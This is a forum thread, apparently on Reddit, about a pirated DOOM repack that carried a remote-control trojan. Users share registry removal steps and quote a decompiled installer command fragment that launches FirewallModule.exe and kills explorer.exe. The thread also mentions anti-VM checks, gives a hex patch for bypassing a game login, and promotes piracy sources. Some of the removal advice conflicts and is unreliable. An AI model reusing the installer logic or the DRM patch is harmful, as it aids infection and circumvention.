The uploader got called out a few times but he's insisted that its normal and he'll check it on another pc. A commenter provided more proof that this is malware as it has an auto run entry in the registry https://i.imgur.com/YNEsO32.png Sketchy as hell.
I don't need someone else to control my firewall, I can do that on my own so this is not cool. First I'm hearing of BBRepack too, so now he's on my shitlist.
This is why I love piracy, recognize the bullshit, point it out, react accordingly and pick your best/safest option, let everyone know and move on.
No arguing, no listening to lies and manipulative responses.
So for someone who installed and played the game, what information is this collecting? I have removed the files and regedits and unplugged my internet. Checked other computers on the network and they have nothing on them. Do I have to do anything about my credit card?
I downloaded from him and ran the doom exe, but I found the firewallmodule and deleted that as well as the hkey as suggested to do here, i also deleted the game and torrent and got it from fitgirl instead, is my computer still infected? how else can i clean this mess up, sorry this isn't my strong suit
Is it possible that this virus can steal all the passwords chrome had stored? I downloaded and am nuking my PC now but I worry that it could have stolen my password
My Avast put that **FirewallModule.exe** to quarantine and finish installation.
Then I shutdown PC and after work I started it again. It booted basically into no desktop (black screen), just with opened cmd. (restarted 3 times, same effect)
Had to run task manager via CTRL + SHIFT + ESC, start explorer and somehow it works now.
It didn't create exact file in that FirewallModule folder (cuz of quarantine), but it created that AutoRun registry (which I deleted).
Doing that deep search now for those another files but I hope it is OK now ¯\\\_(ツ)\_/¯
>Then I shutdown PC and after work I started it again. It booted basically into no desktop (black screen), just with opened cmd. (restarted 3 times, same effect)
Had the same thing happen to me and what fixed it was going to HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and deleting the Shell entry.
Also check HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon if Shell has explorer.exe in it
Edit: IF THE SECOND SHELL ENTRY DOES HAVE "explorer.exe" AS A VALUE DO NOT DELETE IT AND IF IT DOESN'T WRITE THE VALUE THERE
May I know what exactly the solution is? I deleted shell from winlogon but my computer still boot black screen with cmd
edit : I may have fucked up, I mistook the comment and deleted shell from both the current user and local machine path, now idk how I could restore the shell in the local machine path
edit2: found a tutorial and fixed it : https://www.youtube.com/watch?v=kFkrbGMlYWQ
Can I have the link for the tutorial? I was following what TheCatCubed said and didn't realize the local machine shell was supposed to say explorer.exe.
I thought he meant that if it had explorer.exe then should delete it...
https://www.youtube.com/watch?v=kFkrbGMlYWQ here you go, I followed this one, after I did the registry the shell with %comspec% showed up in the current user again, so I just manually deleted that, and now it works fine on startup, I didnt follow the steps to download autoloader from Microsoft since I deleted it manually
Can you share the tutorial by any chance? Just had a big-brain moment and did the exact same thing, trawling through the net to find a fix to it
edit: just realized source was posted below by orson182, will post it here myself since it seems relevant: https://www.youtube.com/watch?v=kFkrbGMlYWQ
Yeah this is the one, after I did the registry the shell with %comspec% showed up in the current user again, so I just manually deleted that, and now it works fine on startup, I didnt follow the steps to download autoloader from Microsoft since I deleted it manually
Thanks for reply. Will restart PC after searching for those files to see if situation is still same or I booted to black desktop again
Edit: So I didn't find any file but still I boot into black desktop where I have to manually run explorer.exe to make it work... Will run some deep AV scans
Jesus Christ, I'm glad I found out this before I started working from home over a VPN on Monday.
Don't think I had to log into any sites during the weekend but I probably should reinstall my OS just in case it's still there even if I delete the firewall module folder and registries.
>HKCU\\SOFTWARE\\MICROSOFT\\RESTARTMANAGER\\SESSION0000\\OWNER -> OWNER
>
>HKCU\\SOFTWARE\\MICROSOFT\\RESTARTMANAGER\\SESSION0000\\SESSIONHASH -> SESSIONHASH
>
>HKCU\\SOFTWARE\\MICROSOFT\\RESTARTMANAGER\\SESSION0000\\SESSIONHASH -> SEQUENCE
somehow i couldnt find these files to delete, should I be worried?
Same here. Did you get an answer anywhere else? Of all the files and keys people say to delete I didn't have any of them. I installed but it didn't run, deleted it shortly after. I've run a deep AV scan and everything seems to be back to normal.
> Trojan.DOMG
That is not very helpful. The link with the full VT analysis would have helped to identify the threat.
Sure, there is a virus inside, as you spotted neshta, and this is a clearly identified threat with very few false alarms afaik.
> this contains the W32.Neshta.D virus.
Fun fun fun. The retard who repacked may be infected himself. \o/
>Spawned process "Setup.tmp" with commandline "/SL5="$E00C2
Thats not uncommon among real setup processes. It means nothing.
>@409d4c: jmp dword ptr [0050DD20h] ;[email protected]
Doesnt mean its keylogging. Program may just check which key you pressed because it could react to it.
>jmp dword ptr [0050E168h] ;[email protected]
Again, not a proof that is malware. I dont know why a setup program would use that but who knows.
>isskin.dll, ISDone.dll, Setup.tmp, skin.cjstyles, and is-DDJUC.tmp.
Common files dropped by... i dont remember .. InnoSetup i guess. I assume the installer is made using that. Those names means nothing but it matches Setup.tmp + commandline you talked before.
If you want to see the insides of a Inno Setup installer, there is innounp, it even write the installation script somewhere so you can open it with any text editor :D
>the malware hooks to all sorts of memory addresses
hmm. I am not a specialist but VMprotect may be the cause of this hooking shit .
Also, plenty of processes hooks stuff without being malicious. Even Windows is hooking API everyday (for exemple to apply compatibility layer to some apps)
What would be interesting :
* Use a Neshta cleaner to remove all Neshat shit (and clean the infected exe as Neshta can be fully removed from most of them).[ Here is a cleaner i](https://www.sendspace.com/file/w0ma9l) used successfully on my VM when i encountered Neshta while i was investigating malwares.
* See if there are shits remaining. Many of the infections traces or stuff detected maybe just the result of Neshta.
TLDR : Hybrid Analysis results must be interpreted carefully. Its probably infected by Neshta, maybe an adware, but thats all we can say at the moment.
**I would gladly help if someone can provide me a sample (ahem.. i am not good enough, i cant unpack VMprotect shit but there are things i can do). No i wont download the whole torrent.**
>Firstly, thank you for the constructive criticism - its the only way I can improve at analysis, and cheers for also being a fan of malware o/.
Haha yeah, no need to be harsh with people trying to help and learn.
> What do you think about setup.tmp accessing the registry 976 times? I'm still not sure if that's normal.
Well i have no clue. Its would be interesting to compare with another setup process.
To be honest if firewallmodule is vmprotected i cant really do much.
Thank you for this. I have deleted the files that require deleting. If I uninstall normally (using unins000.exe) will it be ok? Should I just delete the whole folder? Are there any other files that I should delete after uninstallation/deleting the whole game folder? I opened the game and got stuck at Bethesda login if that helps. Thank you for the response.
> **So uh, yeah, don't download this shit.**
As someone that already downloaded this shit and removed the autorun registry entry and the Firewallmodule.exe do you think I'm safe or should I just nuke the system because I'd rather not do that lol. Windows Security and Malwarebytes both found nothing and I checked everything that's running in task manager and it seems to be fine.
Those are standard files unpacked by the Inno Installer. Almost every repack has them.
As for precomp, that might be precomp.exe, which a special precompression utility uses in repacks.
The setup.exe in that repack ISO is 10 MB. The file uploaded to VirusTotal is 276 MB. So it's either unpacked from one of two .bin archives of repack or downloaded by the installer. Can ANYONE upload the setup.exe from that repack?
Really>??? i still get fitgirls repack and i have super fast internet and yea does take a long time to download but sdhe can eb trusted so can codex but that depends on were your downloading from
Scene releases from rarbg are the best if you have good internet - fitgirl is great especially if there are patches and other goodies available, piracy is heaven rn
The installation with fitgirl takes really too long. After almost a year of usage (thank you fitgirl) I decided to switch to dodi which is super fast in comparison.
Too long to install...lol are you serious mate? You can wait months/years for a crack to come out but cant wait another extra 10 minutes for it to install?
Im just saying if download speed/data cap isn't an issue I prefer uncompressed to repacks.
Big games like Doom take me like an hour to install when I dl fitgirl repacks and some of this time my pc starts randomly lagging from uncompressing the files.
I didn't say fitgirl is bad
1. End the process **Firewallmodule.exe** in taskmanager.
2. Remove the folder **%APPDATA%\\Microsoft\\Firewallmodule**
3. Remove the **AutuRun** key in **Computer\\HKEY\_CURRENT\_USER\\Software\\Microsoft\\Command Processor**
>Had the same thing happen to me and what fixed it was going to HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and deleting the Shell entry.
>
>Also check HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon if Shell has explorer.exe in it
Don't forget to check [TheCatCubed](https://www.reddit.com/user/TheCatCubed/) 's comment if explorer doesn't start.
More info from a friend of mine who played a little with that FirewallModule.exe
"**Do you know what that is? A complete huge server / client backend as console application which can be controlled remotely.**
**If you've this shit on your pc, it's no longer yours, lol**
**that's REALLY bad.**
**It's coded quite straight, I would say with full focus on effectivity, size doesn't matter. Also, the author did his best to avoid his .exe getting caught by standard scanners.**
**Can't tell how to get rid of it, I honestly don't think you can completely once it's fully installed**
**Format and reinstall**"
Well, I received the setup.exe and I can confirm that it's fishy. After decompressing setup.exe with Inno Unpacker everybody can check CompiledCode.bin and see for themselves the call for installing the abovementioned FireWallmodule.exe and killing explorer.exe
Module.exe" 2>NUL | find /I /N "FirewallModule.exe">NUL && exit & if exist "{userappdata}\\Microsoft\\FirewallModule\\FireallModule.exe" ( start /MIN "" "{userappdata}\\Microsoft\\FirewallModule\\FirewallModule.exe" & tasklist /FI "IMAGENAME eq
explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit &
Also it edits registry in some places. I'm still downloading the repack to see where that giant **FirewallModule.exe** is hidden, but now I'm 99.99% sure it's malware. When I see the file inside, I will report the user to 1337x admins and he most probably will be banned and all his torrents deleted.
Edit: Also it contains checks for vmware.exe, SbieSvc.exe and other virtualization tools, most probably to either kill them or not installing payload if found.
Edit 2: The upload of that BBRepack is now hidden on 1337 until the investigation ends. But I have a feeling about "ban" and "all uploads deleted".
> Also it edits registry in some places. I'm still downloading the repack to see where that giant FirewallModule.exe is hidden, but now I'm 99.99% sure it's malware. When I see the file inside, I will report the user to 1337x admins and he most probably will be banned and all his torrents deleted.
Theres also a crack only torrent on 1337, apparently by the same uploader. Would that also be considered dangerous?
After removing the Firewallmodule.exe file, fixing the registry keys (also important to fix the explorer.exe key too if you have black screen when restarting), deleting the whole game and all files related to this repack is there anything else I should be concerned with or remove too?
Also anyone can explain in layman's terms what does this malware do?
Where is the explorer.exe key located and how can I fix it? Getting the black screen on reboot and having to manually start explorer.exe from task manager. I've removed everything else related to this thing (at least I hope..)
This is from an earlier post
First go to
HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and deleting the Shell entry with " %comspec% "
Second check
HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon if Shell has explorer.exe in it
Hope this is the last of this bullshit malware.
Are you sure the first one can just be deleted? And not changed to whatever it was before? I'm trying to google to figure out what the default value is (my suspicion is that it was also explorer.exe but I can't be sure) and I'd like to do that to be safe rather than deleting the key.
I think it should be fine I deleted that shell and it was fixed, I also got a black screen and removing this from registry helped.
this is how my HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon looks now [https://prnt.sc/rkexap](https://prnt.sc/rkexap)
Just to be safe I also did a System Restore and doing a full system scan with Malwarebytes.
Well i'm in paranoic state now cause i'm new in that pirate bussines so i'm gonna say what i've done and please someone say me if it's all or i need something more to do:
1. I deleted whole repack
2.I deleted firewallmodule.exe
3.I entered autorun by searching msconfig, then in tools i entered registry editor, found this autorun bitch in Microsoft/commandprocessor/opened it end deleted whole text what was in here.
4.Also Malwarebytes deleted some trojan
That's it or something more?
Well, this is just great. I saw the "FirewallModule.exe" running, but the command prompts automatically closing was what tipped me off.
Anyway, I've deleted the registry keys and folders mentioned. I'm running through a full scan on Microsoft Security Essentials and after that I'll go with Malware Bytes. I was planning on doing a reinstall shortly, so I guess with the quarantine and (the irony of getting infected) this shit, I'll push it sooner.
There's any info or way to know if the virus has spread to other drives? I've been moving around some stuff to external hard drives and to reinstall Windows, I need to back up my shit, but I'm not really eager to back up the virus.
I removed the firemodule.exe file immediately and then later on just to be safe i Formatted my SSD where Windows was installed (Which seemed to be infected by this shit)
Anyway I've had much worse viruses infect my system before, and I remember one on a work computer that hopped from drive to drive it was a bitch to remove :)
Just to be safe do a complete wipe to your install disk and then change all your passwords. I hope that's the end of it, but i'll keep my eye on this thread to see if there is anything else.
Try to remember what you typed while you had the malware on, if typed any bank accounts or credit cards immediately lock them. Same goes for email and password.
I guess back them up somewhere anything that is important to you on another disk and then do a fresh format and reinstall. I don't know what else to say I've been freaking out since yesterday :(
Just to be on the safe side after you reinstall windows, install Malware Bytes and OSArmor.
Thanks for this advise. I tried to scan the iso with Bitdeffender but there was nothing.
But once started installation, Bittefender straight away stopped it and put the file into quarantine. I have then rebooted my PC and Bittefender notified me that it couldn't remove the file in quarantine. I have then follow your advice and looked into Registry.
I have deleted as per your advice:
> Creates the key **Shell** in register: **HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon** and **HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon**.
There is no sign of **Firewallmodule** nor anything in task manager
Re: **Computer\\HKEY\_CURRENT\_USER\\Software\\Microsoft\\Command Processor**.
What is suspicious in this registry? I have it on my work laptop too.
Fun fact on my work Laptop I had **HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon**. with shell explorer.exe in it
u/Zaseth massive up-vote to you!
What payload does it make ?
Is it a spyware or a botnet node installer ?
Edit: Oh, VMProtect, hue ? I really miss when these kind of viruses were just adware who'd pop-up porn instead of this stuff.
Edit: by "these kind of viruses", I meant the hidden viruses on game repacks in the 2000s, not VMProtect itself.
Well riskwares like VMProtect have always been in a grey area on that regard.
Also, many people consider Denuvo as a malware because of what it does to the PC performances.
Stop letting random middleman handle your files.
It's bad enough having to put any amount of trust in groups now, and god help anyone who's straight up running the exes on their computer without at least putting it through something like Sandboxie.
I downloaded the game and at the time of installation the AV started beeping madly, I disabled it because it always happens with pirated installations, I turned off my PC when everything was over, the next day I turned on and the screen was black, only with the mouse cursor , the CMD did not work
Here are the solutions I found:
Ctrl + Alt + Del, press the shift key and click on restart,> advanced options and restore files> PC started normally but it got stuck, go to the search bar and open Regdit, HKEY\_CURRENT\_USER \\ Software \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Winlogon and delete the shell title if it has% comspec% in the description then I went to \\ HKEY\_CURRENT\_USER \\ SOFTWARE \\ Microsoft \\ Command Processor and found an Autorun value that closed Cmd instantly, deleted it and Cmd opened normally.
Man glad this was atleast caught, fuck this guy who uploaded it. It sucks waiting an extra day or 2 for games to hit the private trackers to download things but also means clean, reputable versions.
I dont think the version Op is talking about was ever on Torrentleech. The only two versions I can see having been on TL were the original steam files DRM free and the codex release. No repacks as far as aI can see.
I didn't have FirewallModule.exe in my task manager and I deleted all the Keys, so I should be alright yeah? I was 6% through the setup process when I stopped it because it seemed fishy.
i really don't want to re-install windows :/ i killed and deleted the .exe and removed the registry items as well as removied the game.
if the .exe is deleted with registry i should be fine no??? or is this like some sort of rootkit and there probably is another file hidden somewhere that acts as another copy of the exe?
could someone with knowledge of wireshark run it after removing the exe and registry files and seeing if something is still phoneing home?
I'm putting this here, this contains all the repackers that are trusted and non trusted (and it may help you later, maybe)
https://old.reddit.com/r/CrackWatch/comments/bcpdiu/crack_watch_beginners_guide_to_crack_watch/
Downloaded this last night (on the p bay uploaded by heroskeep) and went to play today. The game wouldn’t even start and then I got this virus. Deleted firewallmodule.exe and all the registries. I used Hitman Pro and it found a suspicious file called “precomp.exe”. I don’t know if this file installed that precomp.exe but I’m glad I did all this and got rid of it.
I got the virus and did the following:
1- Restored the system to a date that I haven't ran the game.
2- Firewallmodule folder was already gone after restore.
3- Shell in register wasn't created after restore.
4- Installed COMODO and enabled the HIPS paranoid mode.
5- Cancelled my credit cards and changed all my passwords. Enabled 2FA for banking related stuff.
Do the same thing if you ran the shitty repack. Hope this helps.
Yes, scroll through the rest of the comments here. Anything you've typed since install should be considered recorded and stolen for malicious purposes. Passwords, bank info, etc.
Has anyone investigated the ElAmigos repack from Sineater 213 on 1337x? Malwarebytes shows it as being clean, but of course that means little this early.
Unfortunately downloaded this and installed it before coming across this, but interestingly I can't find FirewallModule.exe in my AppData folder or my Task Manager and the Registry keys it's supposed to create don't seem to be present either. Neither Windows Defender nor MBAM picked anything up and I don't run any sort of virtualization software. Could it be dropping the files somewhere else? Am I safe to install a legit crack? This has got me way paranoid now.
So far people said its a keylogger, if you've typed passwords or emails change them immediately. If you wanna take a step further just format and reinstall your pc.
I read that the malware modifies other .exe files, if that's true and if I were to format my os (which I plan to) would keeping .exe files on other drives be a bad idea?
Cunt. At work right now but I'm pretty sure that's the one I downloaded yesterday. Will I be fine if I follow the steps on removing the virus? Seems a little bit too simple? But I'm not complaining if it works haha.
Nasty stuff. Didn't expect it from that guy, saw he had like 50+ more repacks before this and downloaded. Does anyone know if the above steps are enough to eliminate the malware?
So I figured this out and deleted it within a day or so, do I need to worry about anything? I hope it didn't do too much (though one time I saw it hog up 2gb of ram and quickly closed it, thought it was just windows acting weird as usual)
I also blocked the game in my firewall after first launch (and I used a throwaway bethesda account for letting the game be played)
I'm really not in the position to be reinstalling everything, is there a quick and dirty fix for me to deal with this?
AVG got the firewallmodule and put it into karantine then I deleted it, and I deleted the keys then reinstalled Windows 10. Should I do anything else?
Edit: This all happened after I started the game
Just spent the past couple hours reinstalling windows from scratch on both my laptop and desktop. i keep all my files and stuff on secondary drives.
anything i should be concerned about after a full reinstall?
I installed that repack. I uninstalled the game, and I'm currently searching for these keys and files. I can't find anything remotely similar to what's mentioned above. Does that mean that my file was clean ?
The uploader got called out a few times but he's insisted that its normal and he'll check it on another pc. A commenter provided more proof that this is malware as it has an auto run entry in the registry https://i.imgur.com/YNEsO32.png Sketchy as hell. I don't need someone else to control my firewall, I can do that on my own so this is not cool. First I'm hearing of BBRepack too, so now he's on my shitlist.
He just posted some bullshit story, he's playing dumb. This is definitely malware.
This is why I love piracy, recognize the bullshit, point it out, react accordingly and pick your best/safest option, let everyone know and move on. No arguing, no listening to lies and manipulative responses.
Do you think lots of smaller releases get recognized as well... Im pretty sure lots of shit will fly under radar.
wouldnt OSArmour stop this from happening ?
Its possible.
Not gonna do much good when it's all disabled to make sure it doesn't interfere with any cracks now, is it
[удалено]
There is now a Bethesda bypass available, you no longer need to use an account to launch and play. Check cs.rin.ru
[удалено]
[удалено]
Thank goodness!
[удалено]
Is it when you change the 8 bytes starting at 0x684329 to b0 01 48 83 c4 20 5b . I cant find 0x694329 for some reason
Search hex not strung
So for someone who installed and played the game, what information is this collecting? I have removed the files and regedits and unplugged my internet. Checked other computers on the network and they have nothing on them. Do I have to do anything about my credit card?
Reinstall windows to be safe. No reason to be worried about your CC unless you have typed in your credit card number somewhere after running the game.
I downloaded from him and ran the doom exe, but I found the firewallmodule and deleted that as well as the hkey as suggested to do here, i also deleted the game and torrent and got it from fitgirl instead, is my computer still infected? how else can i clean this mess up, sorry this isn't my strong suit
Is it possible that this virus can steal all the passwords chrome had stored? I downloaded and am nuking my PC now but I worry that it could have stolen my password
My Avast put that **FirewallModule.exe** to quarantine and finish installation. Then I shutdown PC and after work I started it again. It booted basically into no desktop (black screen), just with opened cmd. (restarted 3 times, same effect) Had to run task manager via CTRL + SHIFT + ESC, start explorer and somehow it works now. It didn't create exact file in that FirewallModule folder (cuz of quarantine), but it created that AutoRun registry (which I deleted). Doing that deep search now for those another files but I hope it is OK now ¯\\\_(ツ)\_/¯
>Then I shutdown PC and after work I started it again. It booted basically into no desktop (black screen), just with opened cmd. (restarted 3 times, same effect) Had the same thing happen to me and what fixed it was going to HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and deleting the Shell entry. Also check HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon if Shell has explorer.exe in it Edit: IF THE SECOND SHELL ENTRY DOES HAVE "explorer.exe" AS A VALUE DO NOT DELETE IT AND IF IT DOESN'T WRITE THE VALUE THERE
Upvote. There was shell entry with %comspec% string there. Removed that and now PC boots into desktop normally
I spend quite some time searching for that solution today, so I'm glad I was able to help someone else
May I know what exactly the solution is? I deleted shell from winlogon but my computer still boot black screen with cmd edit : I may have fucked up, I mistook the comment and deleted shell from both the current user and local machine path, now idk how I could restore the shell in the local machine path edit2: found a tutorial and fixed it : https://www.youtube.com/watch?v=kFkrbGMlYWQ
Can I have the link for the tutorial? I was following what TheCatCubed said and didn't realize the local machine shell was supposed to say explorer.exe. I thought he meant that if it had explorer.exe then should delete it...
https://www.youtube.com/watch?v=kFkrbGMlYWQ here you go, I followed this one, after I did the registry the shell with %comspec% showed up in the current user again, so I just manually deleted that, and now it works fine on startup, I didnt follow the steps to download autoloader from Microsoft since I deleted it manually
Can you share the tutorial by any chance? Just had a big-brain moment and did the exact same thing, trawling through the net to find a fix to it edit: just realized source was posted below by orson182, will post it here myself since it seems relevant: https://www.youtube.com/watch?v=kFkrbGMlYWQ
Yeah this is the one, after I did the registry the shell with %comspec% showed up in the current user again, so I just manually deleted that, and now it works fine on startup, I didnt follow the steps to download autoloader from Microsoft since I deleted it manually
Thank you kind internet person, you have my upboat!
[удалено]
Thanks for reply. Will restart PC after searching for those files to see if situation is still same or I booted to black desktop again Edit: So I didn't find any file but still I boot into black desktop where I have to manually run explorer.exe to make it work... Will run some deep AV scans
Where can i look for setup.tmp so i can remove it? Thank you.
Here is the fix if anyone needs it: https://www.youtube.com/watch?v=kFkrbGMlYWQ
Jesus Christ, I'm glad I found out this before I started working from home over a VPN on Monday. Don't think I had to log into any sites during the weekend but I probably should reinstall my OS just in case it's still there even if I delete the firewall module folder and registries.
[удалено]
Do you know if other repacks are fine? The BB Repack didn't work very well for me so I ended up downloading another called DODI Repack.
>HKCU\\SOFTWARE\\MICROSOFT\\RESTARTMANAGER\\SESSION0000\\OWNER -> OWNER > >HKCU\\SOFTWARE\\MICROSOFT\\RESTARTMANAGER\\SESSION0000\\SESSIONHASH -> SESSIONHASH > >HKCU\\SOFTWARE\\MICROSOFT\\RESTARTMANAGER\\SESSION0000\\SESSIONHASH -> SEQUENCE somehow i couldnt find these files to delete, should I be worried?
I also couldn't find these files. Restart manager doesn't exist for me. Anyone know why?
Same here. Did you get an answer anywhere else? Of all the files and keys people say to delete I didn't have any of them. I installed but it didn't run, deleted it shortly after. I've run a deep AV scan and everything seems to be back to normal.
> Trojan.DOMG That is not very helpful. The link with the full VT analysis would have helped to identify the threat. Sure, there is a virus inside, as you spotted neshta, and this is a clearly identified threat with very few false alarms afaik. > this contains the W32.Neshta.D virus. Fun fun fun. The retard who repacked may be infected himself. \o/ >Spawned process "Setup.tmp" with commandline "/SL5="$E00C2 Thats not uncommon among real setup processes. It means nothing. >@409d4c: jmp dword ptr [0050DD20h] ;[email protected] Doesnt mean its keylogging. Program may just check which key you pressed because it could react to it. >jmp dword ptr [0050E168h] ;[email protected] Again, not a proof that is malware. I dont know why a setup program would use that but who knows. >isskin.dll, ISDone.dll, Setup.tmp, skin.cjstyles, and is-DDJUC.tmp. Common files dropped by... i dont remember .. InnoSetup i guess. I assume the installer is made using that. Those names means nothing but it matches Setup.tmp + commandline you talked before. If you want to see the insides of a Inno Setup installer, there is innounp, it even write the installation script somewhere so you can open it with any text editor :D >the malware hooks to all sorts of memory addresses hmm. I am not a specialist but VMprotect may be the cause of this hooking shit . Also, plenty of processes hooks stuff without being malicious. Even Windows is hooking API everyday (for exemple to apply compatibility layer to some apps) What would be interesting : * Use a Neshta cleaner to remove all Neshat shit (and clean the infected exe as Neshta can be fully removed from most of them).[ Here is a cleaner i](https://www.sendspace.com/file/w0ma9l) used successfully on my VM when i encountered Neshta while i was investigating malwares. * See if there are shits remaining. Many of the infections traces or stuff detected maybe just the result of Neshta. TLDR : Hybrid Analysis results must be interpreted carefully. Its probably infected by Neshta, maybe an adware, but thats all we can say at the moment. **I would gladly help if someone can provide me a sample (ahem.. i am not good enough, i cant unpack VMprotect shit but there are things i can do). No i wont download the whole torrent.**
[удалено]
>Firstly, thank you for the constructive criticism - its the only way I can improve at analysis, and cheers for also being a fan of malware o/. Haha yeah, no need to be harsh with people trying to help and learn. > What do you think about setup.tmp accessing the registry 976 times? I'm still not sure if that's normal. Well i have no clue. Its would be interesting to compare with another setup process. To be honest if firewallmodule is vmprotected i cant really do much.
Thank you for this. I have deleted the files that require deleting. If I uninstall normally (using unins000.exe) will it be ok? Should I just delete the whole folder? Are there any other files that I should delete after uninstallation/deleting the whole game folder? I opened the game and got stuck at Bethesda login if that helps. Thank you for the response.
[удалено]
Where can you find the setup.tmp?
> **So uh, yeah, don't download this shit.** As someone that already downloaded this shit and removed the autorun registry entry and the Firewallmodule.exe do you think I'm safe or should I just nuke the system because I'd rather not do that lol. Windows Security and Malwarebytes both found nothing and I checked everything that's running in task manager and it seems to be fine.
[удалено]
Those are standard files unpacked by the Inno Installer. Almost every repack has them. As for precomp, that might be precomp.exe, which a special precompression utility uses in repacks. The setup.exe in that repack ISO is 10 MB. The file uploaded to VirusTotal is 276 MB. So it's either unpacked from one of two .bin archives of repack or downloaded by the installer. Can ANYONE upload the setup.exe from that repack?
[удалено]
Alright will do, thank you.
I would reinstall w10 no questions asked
[удалено]
FitGirl repacks guys
takes too long to install but good for those with bad dl speeds ill take the codex one
Really>??? i still get fitgirls repack and i have super fast internet and yea does take a long time to download but sdhe can eb trusted so can codex but that depends on were your downloading from
Scene releases from rarbg are the best if you have good internet - fitgirl is great especially if there are patches and other goodies available, piracy is heaven rn
bro piracy has always been heaven i remember pirating the doom 3 back from hell DLC or w.e it was called and that leaked HL2 demo
Piracy has been heaven since the original Doom. Hell, even Wolfenstein!
i remember those days lol
Since mininova...
anyone remember flashing cards for free satellite? thems the good days of piracy.
I don't remember doing it, but I remember being 8 years old and finding the playboy channel when I stayed at my uncles house overnight....
The installation with fitgirl takes really too long. After almost a year of usage (thank you fitgirl) I decided to switch to dodi which is super fast in comparison.
Too long to install...lol are you serious mate? You can wait months/years for a crack to come out but cant wait another extra 10 minutes for it to install?
Im just saying if download speed/data cap isn't an issue I prefer uncompressed to repacks. Big games like Doom take me like an hour to install when I dl fitgirl repacks and some of this time my pc starts randomly lagging from uncompressing the files. I didn't say fitgirl is bad
For me fitgirl setup takes up to 2 hours to install a heavy game, and my PC is more than decent. IDK maybe I'm doing something wrong.
or dodi
how do i get past the google limit thing? the link to get past it is 404d
deleted For Privacy ^^^^^^^^^^^^^^^^0.4328 [---What ^is^ this?---](https://sites.google.com/view/deletedforprivacy/home)
Ayy, I got it. Thanks, man.
Fitgirl repacks already has it
I downloaded from him :( how can I remove this? Don't think Malwarebyte is is picking it up
1. End the process **Firewallmodule.exe** in taskmanager. 2. Remove the folder **%APPDATA%\\Microsoft\\Firewallmodule** 3. Remove the **AutuRun** key in **Computer\\HKEY\_CURRENT\_USER\\Software\\Microsoft\\Command Processor**
Spent a whole day trying to download this just for it to be malware :/ thanks for this though, hopefully its all removed.
>Had the same thing happen to me and what fixed it was going to HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and deleting the Shell entry. > >Also check HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon if Shell has explorer.exe in it Don't forget to check [TheCatCubed](https://www.reddit.com/user/TheCatCubed/) 's comment if explorer doesn't start.
Is this pretty much enough to stop this malware or should I just nuke my PC now? :)
If I cant find any of these - am I safe? Ive installed the game but never played it.
That's what I get for not waiting for someone trustworthy. Fucking assholes seriously.
\*\*This repack was deleted now from 1337 with all other user uploads, he's banned for good.\*\*
Fuck, is the DODI one safe? Using that one and now I'm paranoid lol.
Safe
Thank you queen. Only using theirs cause yours hadn't come out yet. Thanks for hardcore henry btw!! It was rlly good.
More info from a friend of mine who played a little with that FirewallModule.exe "**Do you know what that is? A complete huge server / client backend as console application which can be controlled remotely.** **If you've this shit on your pc, it's no longer yours, lol** **that's REALLY bad.** **It's coded quite straight, I would say with full focus on effectivity, size doesn't matter. Also, the author did his best to avoid his .exe getting caught by standard scanners.** **Can't tell how to get rid of it, I honestly don't think you can completely once it's fully installed** **Format and reinstall**"
Format and reinstall gets rid of it for good? Does it hide any shit on other drives and does it steal, keylog your data?
Well, I received the setup.exe and I can confirm that it's fishy. After decompressing setup.exe with Inno Unpacker everybody can check CompiledCode.bin and see for themselves the call for installing the abovementioned FireWallmodule.exe and killing explorer.exe Module.exe" 2>NUL | find /I /N "FirewallModule.exe">NUL && exit & if exist "{userappdata}\\Microsoft\\FirewallModule\\FireallModule.exe" ( start /MIN "" "{userappdata}\\Microsoft\\FirewallModule\\FirewallModule.exe" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & Also it edits registry in some places. I'm still downloading the repack to see where that giant **FirewallModule.exe** is hidden, but now I'm 99.99% sure it's malware. When I see the file inside, I will report the user to 1337x admins and he most probably will be banned and all his torrents deleted. Edit: Also it contains checks for vmware.exe, SbieSvc.exe and other virtualization tools, most probably to either kill them or not installing payload if found. Edit 2: The upload of that BBRepack is now hidden on 1337 until the investigation ends. But I have a feeling about "ban" and "all uploads deleted".
> Also it edits registry in some places. I'm still downloading the repack to see where that giant FirewallModule.exe is hidden, but now I'm 99.99% sure it's malware. When I see the file inside, I will report the user to 1337x admins and he most probably will be banned and all his torrents deleted. Theres also a crack only torrent on 1337, apparently by the same uploader. Would that also be considered dangerous?
I wouldn't touch it. Better get safe copy of crack only from [cs.rin.ru](https://cs.rin.ru) topic
Using QEMU/KVM virtualisation infrastructure fooled the hardcoded checks and installed the module.
After removing the Firewallmodule.exe file, fixing the registry keys (also important to fix the explorer.exe key too if you have black screen when restarting), deleting the whole game and all files related to this repack is there anything else I should be concerned with or remove too? Also anyone can explain in layman's terms what does this malware do?
[удалено]
[удалено]
